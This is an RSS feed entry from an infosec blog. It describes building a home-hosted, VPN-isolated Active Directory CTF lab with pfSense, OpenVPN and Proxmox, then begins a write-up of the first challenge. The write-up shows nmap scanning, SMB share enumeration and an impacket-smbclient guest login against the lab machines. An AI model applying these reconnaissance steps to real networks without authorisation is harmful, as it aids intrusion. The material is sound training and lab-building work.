<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>0x90</title>
    <description>&quot;0x90&quot; Zone (or NoOperation Zone). There is actually nothing to see here. This website is for my personal infosec research. Opinions are mine only. It&apos;s a blog, you can find some articles about what I get in the field. Constructive comments are welcome. Have fun, stay safe.
</description>
    <link>http://www.0x90.zone/</link>
    <atom:link href="http://www.0x90.zone/feed.xml" rel="self" type="application/rss+xml"/>
    <pubDate>Thu, 17 Oct 2024 19:57:58 +0000</pubDate>
    <lastBuildDate>Thu, 17 Oct 2024 19:57:58 +0000</lastBuildDate>
    <generator>Jekyll v3.10.0</generator>
    
      <item>
        <title>2023 - 0xOPOSEC Summer Challenge Extravaganza</title>
        <description>&lt;h1 id=&quot;0xoposec-summer-challange-extravaganza&quot;&gt;0xOPOSEC Summer Challenge Extravaganza&lt;/h1&gt;

&lt;p&gt;Last summer, in collaboration with the &lt;a href=&quot;https://www.meetup.com/en/0xoposec/&quot;&gt;0xOPOSEC Meetup&lt;/a&gt;, we developed a CTF to be solved over the summer. This article describes the environment and all the preparation behind it.&lt;/p&gt;

&lt;p&gt;0xOPOSEC is a meetup around Oporto to gather and share security-related knowledge. It is a great experience to be on the lookout for new vectors and threats and to deepen the knowledge of the area.&lt;/p&gt;

&lt;p&gt;With that in mind, it was proposed to create an environment where participants could enter and break the security of such machines at will to solve the challenges that they were presented with.&lt;/p&gt;

&lt;h1 id=&quot;preparation&quot;&gt;Preparation&lt;/h1&gt;

&lt;p&gt;Due to past incidents, we knew that it would be risky to expose such assets in an uncontrolled manner. Exposing vulnerable assets will most surely get us compromised and make us spend more money than we have available. For instance, the last time someone tried to expose a Domain Controller attackers tried to brute force every single password combination, and with that generated a lot of traffic, causing us to be billed more than we intended.&lt;/p&gt;

&lt;p&gt;This is obviously undesirable, so we decided to host everything behind a VPN. That left us with the design of the environment. We quickly noticed that provisioning 5 VMs in the cloud for the whole summer would cost more than buying the hardware and hosting it ourselves. As a bonus, we get to keep the hardware for later challenges.&lt;/p&gt;

&lt;p&gt;It was settled! We would buy the stuff, keep it a secret from our wives, and hope they couldn’t tell by the noise of the server that we were hosting a complete CTF from our home office =D.&lt;/p&gt;

&lt;p&gt;The CTF would be mainly Windows-based since all other challenges were Web-based and we wanted to do something different so everyone can learn something new and call us names when stuff doesn’t work the first time.&lt;/p&gt;

&lt;h1 id=&quot;hardware&quot;&gt;Hardware&lt;/h1&gt;

&lt;p&gt;To keep the secret from our ladies we needed a discreet server. Luckily, nowadays there are several alternatives for that.&lt;/p&gt;

&lt;p&gt;We could have looked at Raspberry Pis, but since our environment would be primarily Windows-based (more on that later) that wouldn’t work. They don’t even meet the hardware requirements to virtualize all the servers we intended to run.&lt;/p&gt;

&lt;p&gt;We took the opportunity to look at micro workstations such as the HPE ProLiant MicroServer, Dell OptiPlex 3070 Micro, and ThinkCentre M710q. Big shout out to Project miniMicro from ServeTheHome, which showcases all the “micro architecture” PCs (they are actually called SFF or &lt;a href=&quot;https://www.youtube.com/watch?v=bx4_QCX_khU&amp;amp;list=PLC53fzn9608B-MT5KvuuHct5MiUDO8IF4&quot;&gt;Small Form Factor computers&lt;/a&gt;) and helped us choose one for our needs!&lt;/p&gt;

&lt;p&gt;Those are quiet, great-looking machines, but they are still expensive. At the time, before the massive increase in prices, we were looking at 1000+ euros for a new machine, so we decided to look at the used market in stores such as BackMarket or OLX. Luckily we were able to get a ThinkCentre for 350 euros (at the time; prices have changed considerably since)! It’s not great, but it is the start of something.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/server.jpg&quot; alt=&quot;Server Thinkcentre M910 tiny&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We knew that the specs were not going to be sufficient: we had a 128GB NVMe SSD, an Intel i5-10500M CPU, and only 8GB of RAM. But the hardware allows for great expansion. 
We scavenged some parts from the old parts bin and found an additional 250GB SSD, and we ordered an additional 8GB SODIMM stick and a 1TB NVMe SSD (storage was going to be an issue with this many machines).&lt;/p&gt;

&lt;p&gt;To virtualize everything the obvious choice was Proxmox Virtual Environment. It offers enterprise-grade features for free. You don’t get any support, but working with templates, replication, clusters, and storage is far easier to&lt;/p&gt;

&lt;p&gt;So, in short, we ended up with the following specs:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Intel I5-10500M CPU&lt;/li&gt;
  &lt;li&gt;16GB of RAM&lt;/li&gt;
  &lt;li&gt;Storage
    &lt;ul&gt;
      &lt;li&gt;128GB NVMe SSD (OS)&lt;/li&gt;
      &lt;li&gt;250GB SSD&lt;/li&gt;
      &lt;li&gt;1TB NVMe SSD (for good luck)&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/li&gt;
  &lt;li&gt;Proxmox Virtualization Server (OS)&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;network&quot;&gt;Network&lt;/h1&gt;

&lt;p&gt;As stated we shouldn’t expose vulnerable assets to the Internet. This could bring unwanted attention to our address and it would prevent legit players from interacting with the lab.&lt;/p&gt;

&lt;p&gt;With that consideration in mind, we needed to create a VPN for players to play at will. This brings several requirements to the lab.&lt;/p&gt;

&lt;p&gt;Since this was a home connection, proper segregation and segmentation should exist in the lab itself. Only VPN client connections should be able to connect to the lab.&lt;/p&gt;

&lt;p&gt;Furthermore, no outbound connections should be allowed. This prevents users with malicious intentions from using the lab as a proxy to attack other Internet services. We are responsible for keeping the lab playable only with learning intent, and never usable as a pivot point to attack other networks. This brings a huge downside: no reverse shells to the Internet are possible.
We also wanted to block connections to the VPN clients themselves that did not originate from those clients. Why? Again, to avoid someone pivoting through the lab to reach other VPN clients and spoil their “fun”.
In other words… no reverse shell for you! Bind shells are OK though.&lt;/p&gt;

&lt;p&gt;The lab should be easily reachable once the user has VPN access (one single segment to start should be enough to simulate one badly configured network).&lt;/p&gt;

&lt;p&gt;With all these considerations in mind we decided that we needed a firewall to easily manage all rules and VPN access to clients.&lt;/p&gt;

&lt;p&gt;Luckily, once again we were blessed with the marvelous Netgate 2100 with pfSense+ software to configure all these requirements and to take the hit with all the connections. Previous tests were conducted and we could manage 15 concurrent connections performing scans with bandwidth and processing power to spare! (We will take a look at all configurations in just a bit, we went a bit crazy with the security settings).&lt;/p&gt;

&lt;h2 id=&quot;networks&quot;&gt;Networks&lt;/h2&gt;

&lt;p&gt;There are essentially two networks:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;One for VPN clients - 192.168.211.0/24;&lt;/li&gt;
  &lt;li&gt;One for the lab itself - 192.168.111.0/24.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Only two networks were chosen to keep the challenge easy for newcomers.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scnetwork1.png&quot; alt=&quot;Network Diagram of the Exercise&quot; /&gt;&lt;/p&gt;

&lt;p&gt;There are some considerations we need to take into account while creating these networks. 
There should be enough IP space for clients. These clients cannot initiate communications with each other (to keep players as secure as possible).&lt;/p&gt;

&lt;p&gt;The LAB network itself should be as segregated as possible; for instance, it should not be possible to initiate a connection to the VPN clients’ network. This is problematic since players wouldn’t get reverse shells; however, it also enhances the security of players, since a lab machine cannot be used as a pivot to attack real clients. Furthermore, some payloads keep calling back to a certain IP until it replies. If that IP is later reassigned to another player, the third party would receive a connection for free, defeating the purpose of the exercise.&lt;/p&gt;

&lt;p&gt;With these requirements in mind, we start building some Firewall Rules.&lt;/p&gt;

&lt;h3 id=&quot;network-rules&quot;&gt;Network Rules&lt;/h3&gt;

&lt;p&gt;In this section, we will take a look at how to deploy certain network Firewall rules to create the environment.&lt;/p&gt;

&lt;p&gt;There are several security considerations we need to take into account to protect the environment. Remember how pfSense processes the network rules: we control a packet when it reaches a network interface of the pfSense (very similar to how AWS and Azure work). This can be problematic for Layer 2 switching (local network) traffic, which never reaches the firewall, but that is not the case for us. It might seem worrying that, for all intents and purposes, clients share the same L2 segment; however, since they are remote VPN clients, every packet is processed at the VPN interface itself and we can control which flows are or aren’t allowed.&lt;/p&gt;

&lt;p&gt;Building correct network rules is “easy”. You allow what you know and block everything else.&lt;/p&gt;

&lt;p&gt;If you instead try to block only the things that you know about, believe me, someone else will know something that you don’t and will leverage it, so avoid that approach.&lt;/p&gt;

&lt;h4 id=&quot;client-network&quot;&gt;Client Network&lt;/h4&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scClientNetworkRules.png&quot; alt=&quot;Network Diagram of the Exercise&quot; /&gt;
&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scclientrulesdenyall.png&quot; alt=&quot;Network Diagram of the Exercise&quot; /&gt;&lt;/p&gt;

&lt;p&gt;This is the simplest network rule set. We will allow only the target network, with a caveat! We can, and should, block the management interface of pfSense on that interface. It is not part of the exercise, and people will inevitably try to attack it even though they are told not to.&lt;/p&gt;

&lt;p&gt;So we created two rules to block clients from reaching the gateway addresses (one for the lab network, and another for the VPN client network).&lt;/p&gt;

&lt;p&gt;We allow clients to reach the whole LAB network.
And just for the sake of visibility, we created an explicit “Deny All” rule. If no rule matches, the firewall blocks the traffic by default anyway, but with this logged rule we gain visibility into who is trying to reach the Internet or other networks through this VPN.&lt;/p&gt;

&lt;p&gt;This essentially denies Internet access to the player through the VPN; however, as you’ll see in the VPN configuration, this is a split-tunnel VPN, meaning that it does not reroute all of the client’s traffic through the tunnel, only the traffic destined for the target network.&lt;/p&gt;

&lt;p&gt;The most keen-eyed of you might have noticed that we haven’t blocked players from reaching other players’ IPs. This is done in the configuration of the VPN server itself, and we will look at it later in the VPN section.&lt;/p&gt;

&lt;h4 id=&quot;lab-network&quot;&gt;Lab Network&lt;/h4&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/sclabrules.png&quot; alt=&quot;Network Diagram of the Exercise&quot; /&gt;&lt;/p&gt;

&lt;p&gt;These rules could be simplified to a single “Deny All”, correct? Well, yes, but that would be a pain to manage. While preparing the environment we needed to update the machines, but even then we did not want them to reach our private networks (just Internet access).
To accomplish that we created several rules to block the &lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc1918&quot;&gt;RFC1918&lt;/a&gt; ranges, and after those we allowed Internet access.&lt;/p&gt;

&lt;p&gt;You may have noticed that the first rule blocks everything reaching the lab network. On its own this achieves nothing, because the VPN clients’ connections are processed at the VPN interface, so that traffic is still routed through. In other words, if the traffic is internally routed (router on a stick) it would still be allowed.
If we want to block traffic it needs to be done closer to the source, almost at the egress/outbound level of the interface. It also makes sense to do so: since we have more control at the source, we avoid resource exhaustion and link usage for packets that would later be dropped anyway.&lt;/p&gt;

&lt;h2 id=&quot;certificate-authority&quot;&gt;Certificate Authority&lt;/h2&gt;

&lt;p&gt;In order to proceed with the VPN access we need to create a Certificate Authority (CA). This ensures that communications are secured for the VPN and for all supporting services such as firewall management and the virtualization environment (we do not want people intercepting sensitive credentials in case of a major compromise).&lt;/p&gt;

&lt;p&gt;We decided to use the Firewall CA engine to do that, yes, we are centralizing a lot of services on the firewall, but if we paid for the whole firewall we are going to use the whole firewall!&lt;/p&gt;

&lt;p&gt;Creating one is easy: just go to System-&amp;gt;Cert. Manager.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scCA.png&quot; alt=&quot;Network Diagram of the Exercise&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We then created a new CA, because we are also going to replace the certificate of the firewall itself (so we know we are connecting to a trusted site). Just click “+Add”.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scCA2.png&quot; alt=&quot;Network Diagram of the Exercise&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We fill in everything accordingly. We chose an RSA key of 8192 bits and the SHA512 digest algorithm. This might be excessive, but in my opinion, with hardware acceleration in place, it is a good compromise between security and convenience. Luckily the hardware handles all of this just fine.&lt;/p&gt;

&lt;p&gt;Create the CA and go to the “Certificates” tab. There we can manage all certificates and create new ones.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scCACerts.png&quot; alt=&quot;Network Diagram of the Exercise&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We need to create certificates for users, for the firewall, and for the Proxmox environment.&lt;/p&gt;

&lt;p&gt;We create each one by pressing the “Add” button and filling in every field accordingly.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scCACertpfsense.png&quot; alt=&quot;Network Diagram of the Exercise&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Yes, we chose the same key size and algorithms for the certificates (the expiration date is less than one year, otherwise some clients will raise errors). For a simple CA we should be OK (TM).&lt;/p&gt;

&lt;p&gt;Lastly, we export the CA public certificate and add it to our machines. The public CA file can be exported from the CA section of the pfSense configuration, as shown in the picture:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scExportCA.png&quot; alt=&quot;Network Diagram of the Exercise&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Add the CA to your Operating System/Browser and every site that presents a certificate signed by that CA will be trusted.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scCertPfsense.png&quot; alt=&quot;Network Diagram of the Exercise&quot; /&gt;&lt;/p&gt;

&lt;p&gt;If you don’t know how to do this, I recommend &lt;a href=&quot;https://thomas-leister.de/en/how-to-import-ca-root-certificate/&quot;&gt;this&lt;/a&gt; and &lt;a href=&quot;https://linuxkamarada.com/en/2018/10/30/how-to-install-website-certificates-on-linux&quot;&gt;this&lt;/a&gt; website (they worked for me).&lt;/p&gt;

&lt;p&gt;And now we can concentrate on creating the VPN with that new CA!&lt;/p&gt;

&lt;h2 id=&quot;vpn&quot;&gt;VPN&lt;/h2&gt;

&lt;p&gt;Finally, we are going to give users access to our environment in a somewhat controlled way!&lt;/p&gt;

&lt;p&gt;For that, we need to create a VPN server. We had already established that the firewall would act as the VPN concentrator (it makes sense). To simplify things we are going to use OpenVPN. We could have chosen a different application, but it seemed good enough for the intended purpose.&lt;/p&gt;

&lt;p&gt;So we went to VPN-&amp;gt;OpenVPN in the pfSense administrative interface, and on the Servers tab we created a new server:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scVPN.png&quot; alt=&quot;VPN Access&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We hit a snag on this one. We didn’t want to use the firewall’s local user database for the connection; we wanted to keep authentication separate. The reasons for that are twofold:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;We don’t want to give players access to the pfSense management interface - although that can be fixed with a group in its configuration;&lt;/li&gt;
  &lt;li&gt;There are other VPN services running on the firewall, and a local user would be able to access those other VPN instances, since the way OpenVPN works here is to share the same key across multiple instances to allow inbound connections.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For that, we needed to create an authentication service. Luckily we already had a virtualization environment, so we just created an LXC container running FreeRADIUS for this authentication (it was literally just installing FreeRADIUS, setting a shared secret, and creating one user there), on a completely different network to ensure segregation of duties and prevent people from attacking it.&lt;/p&gt;

&lt;p&gt;We then needed to add an authentication provider in pfSense. For that, we went to “System-&amp;gt;User Management” and selected the “Authentication Servers” section. Add one and configure it accordingly.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scVPNAuth.png&quot; alt=&quot;VPN Authentication Configuration &quot; /&gt;&lt;/p&gt;

&lt;p&gt;Going back to the VPN configuration, we fill in every piece of information needed for the service:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/pfsenseVPNConfig.png&quot; alt=&quot;VPN Access Configuration &quot; /&gt;&lt;/p&gt;

&lt;p&gt;Server Mode was set to “Remote Access (SSL/TLS + User Auth)”. This rejects any connection that does not present both the correct user certificate and a valid username+password combination, for the reasons previously stated.&lt;/p&gt;

&lt;p&gt;We chose the new backend authentication server that was just created.&lt;/p&gt;

&lt;p&gt;Select “tun - Layer 3 Tunnel Mode” to avoid headaches in some operating systems that don’t like Layer 2 tunnels.&lt;/p&gt;

&lt;p&gt;The rest of the configuration was left at the defaults, apart from the cipher suite configuration of the server:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scVPNCS.png&quot; alt=&quot;VPN Access Configuration &quot; /&gt;&lt;/p&gt;

&lt;p&gt;In the Tunnel section, we created the new network 192.168.211.0/24. Notice the unchecked boxes for forcing all client traffic to be redirected through the tunnel? This is what we call a split tunnel, so we need to declare which local networks are reachable through this server in the “IPv4 Local network(s)” field, and we set the lab network, 192.168.111.0/24, for that purpose.&lt;/p&gt;

&lt;p&gt;Since the access will be shared by players, we needed to check the “Duplicate Connection” box to “Allow multiple concurrent connections from the same user”.&lt;/p&gt;

&lt;p&gt;Lastly, in the client settings, we set a /30 per client to isolate them as much as possible:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scVPNCI.png&quot; alt=&quot;VPN Client Isolation &quot; /&gt;&lt;/p&gt;

&lt;p&gt;And we are done! I won’t go into how to set up port forwarding on your ISP router, but if you got this far, it should be an easy task for you.&lt;/p&gt;

&lt;h2 id=&quot;virtualized-environment&quot;&gt;Virtualized environment&lt;/h2&gt;

&lt;p&gt;For the virtualization environment, we chose Proxmox. It is easy to use and free, with enterprise features.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scPVE.png&quot; alt=&quot;VPN Client Isolation &quot; /&gt;&lt;/p&gt;

&lt;p&gt;To ensure isolation of the environment we created a specific VLAN for management. 
All traffic needs to be tagged for the VLANs to work, and the tag is set when the VM/container is created. This means that if someone forgets to add a VLAN tag to a virtual machine, its traffic enters the blackhole VLAN and is dropped.&lt;/p&gt;

&lt;p&gt;For this to be achieved we need to:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Set up the VLANs on the firewall (and on the switch, if you have one);&lt;/li&gt;
  &lt;li&gt;Set up the Proxmox network interfaces to use them.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&quot;set-up-pfsense&quot;&gt;Set up pfSense&lt;/h3&gt;

&lt;p&gt;Due to the nature of the switch SoC in this pfSense appliance, some adjustments need to be made. Go to “Interfaces-&amp;gt;Switches” in pfSense and select the VLANs section to create new VLANs.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scVLAN.png&quot; alt=&quot;VPN Client Isolation &quot; /&gt;&lt;/p&gt;

&lt;p&gt;Make sure 802.1Q is enabled, then click “Add tag”.&lt;/p&gt;

&lt;p&gt;Now comes the tricky part. You need to set a VLAN ID (choose your own), and you need to add the port where you are going to connect your server.&lt;/p&gt;

&lt;p&gt;However, you also need to &lt;em&gt;add the WAN&lt;/em&gt; interface! Otherwise you won’t get any packets flowing. Mark both members as “Tagged”!&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scVLAN2.png&quot; alt=&quot;VLAN tagging &quot; /&gt;&lt;/p&gt;

&lt;p&gt;In this example the PVE is connected to port 4 and the WAN is connected to port 5.&lt;/p&gt;

&lt;p&gt;We are not done! Create a new member and let’s add our blackhole VLAN (to avoid untagged traffic reaching our internal network).&lt;/p&gt;

&lt;p&gt;Select a new VLAN ID (I used the last available one so it doesn’t get in the way) and select your port. In my case, it was port 4 &lt;em&gt;without tagging&lt;/em&gt;. With this configuration, any traffic that arrives without a tag falls back into the blackhole VLAN and no connectivity is allowed.&lt;/p&gt;

&lt;p&gt;Now add the last VLAN, for the lab itself! Follow the same procedure: assign a new VLAN ID and choose the port where you will connect Proxmox, plus the WAN port.&lt;/p&gt;

&lt;p&gt;Make sure to remove the port from the system’s default VLAN in the table:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scVLAN.png&quot; alt=&quot;Blackhole VLAN&quot; /&gt;&lt;/p&gt;

&lt;p&gt;And we are done!&lt;/p&gt;

&lt;h3 id=&quot;set-up-proxmox&quot;&gt;Set up Proxmox&lt;/h3&gt;

&lt;p&gt;With pfSense set up, it’s time to configure our server’s network. The intent is to have the management interface in its own VLAN and let the remaining traffic flow as is.
We will configure the VLAN tag on each resource itself.
If someone tags a VLAN that is not ours, the traffic goes nowhere, since only the allowed tags are permitted by pfSense (as previously configured).&lt;/p&gt;

&lt;p&gt;To achieve that we need a terminal. The easiest moment to do this is while installing Proxmox, since you have to change the management interface anyway because of the network change. In the file &lt;em&gt;/etc/network/interfaces&lt;/em&gt; set up the VLAN as follows:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scProxmox.png&quot; alt=&quot;VPN Client Isolation &quot; /&gt;&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;# Loopback interface, we don&apos;t care about it
auto lo
iface lo inet loopback

# This is the physical interface of the host; set it to manual (no address, it only serves as a bridge port)
iface eno1 inet manual

# This is the VLAN sub-interface for the management VLAN. You need to create it in order to assign the IP of the management console
iface eno1.&amp;lt;REDACTED VLAN ID&amp;gt; inet manual
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;After that block of code, comes the initialization of the interfaces to be persistent across reboots:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;# Set up the management bridge on top of the VLAN sub-interface
auto vmbr0v&amp;lt;REDACTED VLAN ID&amp;gt;
iface vmbr0v&amp;lt;REDACTED VLAN ID&amp;gt; inet static
        address 192.168.&amp;lt;REDACTED CIDR&amp;gt;
        gateway 192.168.&amp;lt;REDACTED&amp;gt;
        # Bridge this virtual interface to the tagged sub-interface of the physical interface
        bridge-ports eno1.&amp;lt;REDACTED&amp;gt;
        bridge-stp off
        bridge-fd 0

# Untagged bridge on the physical interface; VMs and containers attach here with their own VLAN tag
auto vmbr0
iface vmbr0 inet manual
        bridge-ports eno1
        bridge-stp off
        bridge-fd 0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;And now, with access to the management console, we can create VLAN-tagged resources!
When creating a new VM or container, just make sure to specify the tag you want. With this configuration, all traffic leaving the resource is tagged and lands in the correct network (so we don’t allow VLAN hopping).&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scPVE2.png&quot; alt=&quot;VPN Client Isolation &quot; /&gt;&lt;/p&gt;

&lt;p&gt;And now we create a bunch of VMs!&lt;/p&gt;

&lt;h3 id=&quot;all-machines&quot;&gt;All machines&lt;/h3&gt;

&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;Machine&lt;/th&gt;
      &lt;th&gt;vCPU&lt;/th&gt;
      &lt;th&gt;Memory (GB)&lt;/th&gt;
      &lt;th&gt;IP address&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;LAB-DC&lt;/td&gt;
      &lt;td&gt;2&lt;/td&gt;
      &lt;td&gt;1&lt;/td&gt;
      &lt;td&gt;192.168.111.26&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;LAB-SHARE&lt;/td&gt;
      &lt;td&gt;2&lt;/td&gt;
      &lt;td&gt;1&lt;/td&gt;
      &lt;td&gt;192.168.111.30&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;LAB-MGMT&lt;/td&gt;
      &lt;td&gt;2&lt;/td&gt;
      &lt;td&gt;1&lt;/td&gt;
      &lt;td&gt;192.168.111.36&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;LAB-WIN6&lt;/td&gt;
      &lt;td&gt;2&lt;/td&gt;
      &lt;td&gt;2&lt;/td&gt;
      &lt;td&gt;192.168.111.41&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;LAB-WIN7&lt;/td&gt;
      &lt;td&gt;2&lt;/td&gt;
      &lt;td&gt;2&lt;/td&gt;
      &lt;td&gt;192.168.111.42&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;LAB-LIN1&lt;/td&gt;
      &lt;td&gt;2&lt;/td&gt;
      &lt;td&gt;1&lt;/td&gt;
      &lt;td&gt;192.168.111.31&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;LAB-LIN2&lt;/td&gt;
      &lt;td&gt;2&lt;/td&gt;
      &lt;td&gt;1&lt;/td&gt;
      &lt;td&gt;192.168.111.34&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;These are the machines at play and their respective configurations. All Windows-based machines were built from a Windows Server 2016 Datacenter edition image.&lt;/p&gt;

&lt;p&gt;Linux machines were based on the Ubuntu Server 22.04 image.&lt;/p&gt;

&lt;p&gt;We decided to create two templates (to save space and time): Windows and Linux. We then created all machines using those templates.&lt;/p&gt;

&lt;p&gt;For Windows machines, we needed to run the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;sysprep&lt;/code&gt; command before joining them to the domain, since otherwise the SIDs would be identical and conflict with already-joined machines.&lt;/p&gt;

&lt;p&gt;Later we would run a set of scripts to provision the environment.&lt;/p&gt;

&lt;p&gt;Bear in mind that some GPOs needed to be created to disable antivirus, disable account lockouts, enable anonymous SID, disable the firewall, and even block the rotation of machine account passwords. This was decided to make the challenge easier for players, so they could learn from a poorly implemented domain.&lt;/p&gt;

&lt;p&gt;Linux was easier: provision the machine, run the scripts and that’s it.&lt;/p&gt;

&lt;h1 id=&quot;write-up&quot;&gt;Write-up&lt;/h1&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scPVE2.png&quot; alt=&quot;VPN Client Isolation &quot; /&gt;&lt;/p&gt;

&lt;p&gt;The intent of the CTF was to follow the illustrated path. After the initial access, several challenges were presented until the user could compromise the entire domain and all machines.&lt;/p&gt;

&lt;h2 id=&quot;challenge---larapios-group-access&quot;&gt;Challenge - Larapios Group Access&lt;/h2&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Larapios Group states that they have access to our core infrastructure!
They claim that our security is lacking and have credentials to access our systems.
Quickly, grab the access and gain access to one of the internal machines!
(...)
Note: There are several accounts possible, due to the RDP nature only one person at a time can use one account. If it fails, use a similar account
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;You are given an OpenVPN configuration file and a set of credentials.
You will quickly notice the route pushed to your machine, which suggests that this is the correct network.
To make this easier, we disclose the target network so the player doesn’t attack other networks.&lt;/p&gt;

&lt;p&gt;Since ICMP was not allowed in the network (as you can see in the network rules, only TCP and UDP were allowed), we need to scan the network with a different option in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nmap&lt;/code&gt;. For instance, we can skip the host discovery (alive check) altogether with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-Pn&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;One command example is as follows: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nmap 192.168.111.0/24 -Pn --open -sC&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;This command will not only enumerate all machines, but also run the default enumeration scripts of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nmap&lt;/code&gt;. 
You’ll notice that the environment is largely based on Active Directory, and you can get the domain name: &lt;em&gt;BAJORDAS.local&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scChal1.png&quot; alt=&quot;VPN Client Isolation &quot; /&gt;&lt;/p&gt;

&lt;p&gt;One of the basic things I like to do in these environments is to look for open shares. Companies frequently open shares too widely, believing they are only reachable from internal networks, and disclose sensitive information there. Using the script &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;smb-enum-shares&lt;/code&gt;, the player can see that one machine, &lt;em&gt;LAB-SHARE&lt;/em&gt; (the name almost gives it away), has open shares.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scChal1-1.png&quot; alt=&quot;Chal 1&quot; /&gt;&lt;/p&gt;

&lt;p&gt;With this information, we can just simply connect to the share and retrieve files.&lt;/p&gt;

&lt;p&gt;Impacket’s smbclient is a quick and easy way to connect and dump the information: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;impacket-smbclient Guest@192.168.111.30&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;By browsing the share you’ll find a script that mentions a user, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;sedalfino.freitas&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scChal1-2.png&quot; alt=&quot;Chal 1&quot; /&gt;&lt;/p&gt;

